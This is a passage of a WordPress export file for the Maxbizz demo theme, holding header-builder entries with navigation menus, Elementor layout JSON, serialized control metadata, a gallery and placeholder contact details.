					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
			<a href="#" role="button">
						FREE QUOTE
					</a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/">
					<img src="https://maxbizz.s3.amazonaws.com/images/04_Black.svg" alt="Maxbizz Corporate">
				</a>			        
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-1703"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1704"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1748"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/about-us/">About Us</a></li>
	<li id="menu-item-1770"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/">Our Services 1</a></li>
	<li id="menu-item-1765"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1754"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1755"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/">Our Team</a></li>
	<li id="menu-item-1756"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1752"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/elements/">Elements</a></li>
	<li id="menu-item-1757"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/typography/">Typography</a></li>
	<li id="menu-item-1753"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/faqs/">FAQs</a></li>
	<li id="menu-item-1749"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/404-2/">404</a></li>
	<li id="menu-item-1750"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1768"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1771"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1769"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1767"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1774"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1766"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/">Services</a>
<ul>
	<li id="menu-item-1764"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1763"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1762"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1761"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1760"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1759"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1758"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">Blog</a>
<ul>
	<li id="menu-item-1772"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/blog/">Blog List</a></li>
	<li id="menu-item-1773"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1751"><a href="http://wpdemo.archiwp.com/maxbizz-corporate/contacts/">Contacts</a></li>
</ul>			</nav>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>217</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 06:55:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 06:55:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-4]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2bd5f14","elType":"section","settings":{"content_position":"middle","structure":"21","background_background":"classic","background_color":"#0B2A41","margin":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true}},"elements":[{"id":"f191d30","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"6d41460","elType":"widget","settings":{"view":"inline","icon_list":[{"text":"  Mon - Sat: 8.00 - 18.00","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"_id":"e6e2d89"},{"text":"411 University St, Seattle","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"_id":"6e383c8"},{"text":"+1-800-456-478-23","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"_id":"25c4675","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":45,"sizes":[]},"icon_color":"#55BB53","text_color":"#FFFFFF","text_indent":{"unit":"px","size":7,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_line_height":{"unit":"em","size":1,"sizes":[]},"icon_size":{"unit":"px","size":15,"sizes":[]},"icon_typography_font_weight":"500"},"elements":[],"widgetType":"icon-list"}],"isInner":false},{"id":"eb1b801","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"99b486b","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(255, 255, 255, 0)"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_spacing":{"unit":"px","size":20,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0.3)","icon_color":"custom","hover_border_color":"#4B82FB","icon_secondary_color":"#8497A5","hover_secondary_color":"#FFFFFF","icon_padding":{"unit":"em","size":0,"sizes":[]}},"elements":[],"widgetType":"social-icons"},{"id":"eb90cd2","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","background_color":"#55BB53","hover_color":"#0B2A41","button_background_hover_color":"#F5F5F5","button_hover_border_color":"#55BB53","border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"text_padding":{"unit":"px","top":"13","right":"29","bottom":"12","left":"29","isLinked":false},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"10","isLinked":false},"typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"button"}],"isInner":false}],"isInner":false},{"id":"36d15d3","elType":"section","settings":{"structure":"20","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"sticky_class":"is-fixed","sticky_background":"#FFFFFF"},"elements":[{"id":"5bfa0e8","elType":"column","settings":{"_column_size":50,"_inline_size":30},"elements":[{"id":"4aa2514","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Black.svg","id":383},"_padding":{"unit":"px","top":"26","right":"0","bottom":"27","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"b62b09b","elType":"column","settings":{"_column_size":50,"_inline_size":70,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"d943b8e","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#55BB53","menu_typography_typography":"custom","menu_typography_font_family":"Open Sans","smenu_typography_typography":"custom","smenu_typography_font_family":"Open Sans"},"elements":[],"widgetType":"imenu"},{"id":"64ad134","elType":"widget","settings":{"bg_btn":"#55BB53","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"20","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:2:{s:4:"view";i:1;s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:6:{s:10:"text_color";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_line_height";i:1;s:27:"icon_typography_font_weight";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:4;s:5:"align";i:2;s:17:"_ot_content_align";i:2;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:7:{s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:12:"icon_padding";i:1;}s:20:"section_social_hover";a:2:{s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_button";a:1:{s:4:"text";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:13:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:16:"background_color";i:1;s:11:"hover_color";i:1;s:29:"button_background_hover_color";i:1;s:25:"button_hover_border_color";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;s:13:"border_radius";i:1;s:12:"text_padding";i:1;s:22:"typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:1:{s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:2:{s:12:"sticky_class";i:1;s:17:"sticky_background";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:6:"margin";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:2:{s:18:"style_menu_section";a:3:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;}s:19:"style_smenu_section";a:2:{s:27:"smenu_typography_typography";i:1;s:28:"smenu_typography_font_family";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Side Panel</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/side-panel/</link>
		<pubDate>Fri, 24 Apr 2020 07:40:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=253</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-finance/">
					<img src="https://maxbizz.s3.amazonaws.com/images/05_Black.svg" alt="Maxbizz Finance">
				</a>			        
		Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.		
			<h4>Gallery</h4>		
			<figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-10" href='https://maxbizz.s3.amazonaws.com/images/project-10.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-10-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-10-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-10-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-12" href='https://maxbizz.s3.amazonaws.com/images/project-12.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-12-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-12-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-12-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-12-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-12.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-9" href='https://maxbizz.s3.amazonaws.com/images/project-9.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-9-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-9-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-9-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-9-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-9.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-7" href='https://maxbizz.s3.amazonaws.com/images/project-7.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-7-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-7-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-7-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-6" href='https://maxbizz.s3.amazonaws.com/images/project-6.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-5" href='https://maxbizz.s3.amazonaws.com/images/project-5.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure>
			<h4>Contact</h4>		
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23"></a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
				</h6>
								<p>411 University St, Seattle</p>
				<a href="mailto:%20maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:%20maxbizz@mail.com"></a>
				</h6>
								<p>maxbizz@mail.com</p>
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener">
						Instagram
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>253</wp:post_id>
		<wp:post_date><![CDATA[2020-04-24 07:40:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-04-24 07:40:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[side-panel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"abdb372","elType":"section","settings":{"padding":{"unit":"px","top":"40","right":"40","bottom":"40","left":"40","isLinked":true},"background_background":"classic"},"elements":[{"id":"42dd159","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"99ef7b3","elType":"widget","settings":{"logo_width":{"unit":"px","size":145,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05_Black.svg","id":2577}},"elements":[],"widgetType":"ilogo"},{"id":"4408930","elType":"widget","settings":{"editor":"Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.","_margin":{"unit":"px","top":"0","right":"0","bottom":"27","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"561f157","elType":"widget","settings":{"title":"Gallery","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom"},"elements":[],"widgetType":"heading"},{"id":"0979c03","elType":"widget","settings":{"wp_gallery":[{"id":800,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-10.jpg"},{"id":803,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-12.jpg"},{"id":811,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-9.jpg"},{"id":819,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-7.jpg"},{"id":827,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-6.jpg"},{"id":823,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-5.jpg"}],"gallery_columns":"3","thumbnail_size":"maxbizz-portfolio-thumbnail-grid","open_lightbox":"yes"},"elements":[],"widgetType":"image-gallery"},{"id":"81b5457","elType":"widget","settings":{"title":"Contact","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom"},"elements":[],"widgetType":"heading"},{"id":"dfc527a","elType":"widget","settings":{"title_text":"","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"text_align_mobile":"left","description_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"a86f8fa","elType":"widget","settings":{"title_text":"","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"text_align_mobile":"left","title_typography_typography":"custom"},"elements":[],"widgetType":"icon-box"},{"id":"c0cbcd5","elType":"widget","settings":{"title_text":"","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#52C5B6","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"ca934ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#E40000"},{"social_icon":{"value":"fab 